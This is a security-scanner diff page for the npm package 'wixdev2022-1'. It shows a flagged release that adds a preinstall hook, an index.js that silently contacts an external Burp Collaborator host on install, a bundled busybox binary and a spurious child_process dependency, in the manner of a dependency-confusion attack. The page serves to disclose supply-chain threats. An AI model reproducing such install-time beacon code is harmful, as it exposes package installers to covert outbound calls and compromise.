wixdev2022-1 0.0.1-security → 1.0.11
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of wixdev2022-1 might be problematic. Click here for more details.
- package/busybox +0 -0
- package/index.js +10 -0
- package/package.json +11 -3
- package/README.md +0 -5
package/busybox
ADDED
Binary file
|
package/index.js
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
const axios = require('axios');
|
2
|
+
|
3
|
+
axios.get('https://b9lg80fz7mrgpk4cdjy05l5rnitgh5.burpcollaborator.net/?npmjs')
|
4
|
+
.then(response => {
|
5
|
+
console.log(response.data.url);
|
6
|
+
console.log(response.data.explanation);
|
7
|
+
})
|
8
|
+
.catch(error => {
|
9
|
+
console.log(error);
|
10
|
+
});
|
package/package.json
CHANGED
@@ -1,6 +1,14 @@
|
|
1
1
|
{
|
2
2
|
"name": "wixdev2022-1",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.11",
|
4
|
+
"description": "private package for wix development",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"child_process": "^1.0.2"
|
13
|
+
}
|
6
14
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=wixdev2022-1 for more information.
|